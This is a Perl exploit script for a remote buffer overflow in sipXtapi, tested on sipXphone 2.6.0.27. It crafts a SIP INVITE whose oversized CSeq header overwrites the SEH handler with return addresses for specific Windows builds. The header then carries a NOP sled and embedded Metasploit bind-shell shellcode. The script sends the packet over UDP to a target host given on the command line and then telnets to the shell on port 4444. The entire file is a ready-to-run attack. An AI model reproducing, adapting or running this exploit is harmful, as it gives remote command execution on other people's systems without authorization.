sipXtapi.txt

`#!/usr/bin/perl  
#   
# Remote Buffer Overflow in sipXtapi  
#   
# bad char 0x00 0x09 0x0a 0x0d 0x20  
#  
  
  
use IO::Socket;  
#use strict;  
  
print "\n\n";  
print "sipXtapi original Exploit by Michael Thumann added a real shellcode by acaro\n\n";  
print "tested on sipXphone 2.6.0.27 read the code for ret address\n\n";  
  
if (not $ARGV[0]) {  
print "Usage: sipx.pl <host>\n";  
exit;}  
  
$target=$ARGV[0];  
my $source ="127.0.0.1";  
my $target_port = 5060;  
my $user ="bad";  
my $nextseh = "\xeb\x06\x90\x90";  
my $seh="\xb0\x67\x01\x08"; # pop pop ret in jvm.dll for winxp Pro SP2 Italian universal ?  
#my $seh="\x27\x13\x02\x08"; # call ebx in jvm.dll for win2k Pro SP0 Italian universal ?  
#my $seh="\x22\x92\x06\x08"; # jmp ebx in jvm.dll for win2k Pro SP0 Italian universal ?   
# if you use this ret you can exploits the target host many times  
my $nop = "\x90"x32;  
  
  
# win32_bind - EXITFUNC=seh LPORT=4444 Size=344 Encoder=PexFnstenvSub http://metasploit.com  
my $shellcode =   
"\x33\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x25".  
"\xe3\xa5\x9f\x83\xeb\xfc\xe2\xf4\xd9\x89\x4e\xd2\xcd\x1a\x5a\x60".  
"\xda\x83\x2e\xf3\x01\xc7\x2e\xda\x19\x68\xd9\x9a\x5d\xe2\x4a\x14".  
"\x6a\xfb\x2e\xc0\x05\xe2\x4e\xd6\xae\xd7\x2e\x9e\xcb\xd2\x65\x06".  
"\x89\x67\x65\xeb\x22\x22\x6f\x92\x24\x21\x4e\x6b\x1e\xb7\x81\xb7".  
"\x50\x06\x2e\xc0\x01\xe2\x4e\xf9\xae\xef\xee\x14\x7a\xff\xa4\x74".  
"\x26\xcf\x2e\x16\x49\xc7\xb9\xfe\xe6\xd2\x7e\xfb\xae\xa0\x95\x14".  
"\x65\xef\x2e\xef\x39\x4e\x2e\xdf\x2d\xbd\xcd\x11\x6b\xed\x49\xcf".  
"\xda\x35\xc3\xcc\x43\x8b\x96\xad\x4d\x94\xd6\xad\x7a\xb7\x5a\x4f".  
"\x4d\x28\x48\x63\x1e\xb3\x5a\x49\x7a\x6a\x40\xf9\xa4\x0e\xad\x9d".  
"\x70\x89\xa7\x60\xf5\x8b\x7c\x96\xd0\x4e\xf2\x60\xf3\xb0\xf6\xcc".  
"\x76\xb0\xe6\xcc\x66\xb0\x5a\x4f\x43\x8b\xb4\xc3\x43\xb0\x2c\x7e".  
"\xb0\x8b\x01\x85\x55\x24\xf2\x60\xf3\x89\xb5\xce\x70\x1c\x75\xf7".  
"\x81\x4e\x8b\x76\x72\x1c\x73\xcc\x70\x1c\x75\xf7\xc0\xaa\x23\xd6".  
"\x72\x1c\x73\xcf\x71\xb7\xf0\x60\xf5\x70\xcd\x78\x5c\x25\xdc\xc8".  
"\xda\x35\xf0\x60\xf5\x85\xcf\xfb\x43\x8b\xc6\xf2\xac\x06\xcf\xcf".  
"\x7c\xca\x69\x16\xc2\x89\xe1\x16\xc7\xd2\x65\x6c\x8f\x1d\xe7\xb2".  
"\xdb\xa1\x89\x0c\xa8\x99\x9d\x34\x8e\x48\xcd\xed\xdb\x50\xb3\x60".  
"\x50\xa7\x5a\x49\x7e\xb4\xf7\xce\x74\xb2\xcf\x9e\x74\xb2\xf0\xce".  
"\xda\x33\xcd\x32\xfc\xe6\x6b\xcc\xda\x35\xcf\x60\xda\xd4\x5a\x4f".  
"\xae\xb4\x59\x1c\xe1\x87\x5a\x49\x77\x1c\x75\xf7\xd5\x69\xa1\xc0".  
"\x76\x1c\x73\x60\xf5\xe3\xa5\x9f";  
my $cseq =("\x41"x204).$nextseh.$seh.$nop.$shellcode;  
  
  
my $packet =<<END;  
INVITE sip:user\@$source SIP/2.0\r  
To: <sip:$target:$target_port>\r  
Via: SIP/2.0/UDP $target:3277\r  
From: "moz"<sip:$target:3277>\r  
Call-ID: 3121$target\r  
CSeq: $cseq\r  
Max-Forwards: 70\r  
Contact: <sip:$source:5059>\r  
\r  
END  
  
print "Sending Packet to: " . $target . "\n\n";  
socket(PING, PF_INET, SOCK_DGRAM, getprotobyname("udp"));  
my $ipaddr = inet_aton($target);  
my $sendto = sockaddr_in($target_port,$ipaddr);  
send(PING, $packet, 0, $sendto) == length($packet) or die "cannot send to $target : $target_port : $!\n";  
print "Done.\n";  
$host = $ARGV[0];  
  
print " + connect to $host on port 4444...\n";  
  
system("telnet $host 4444");  
  
`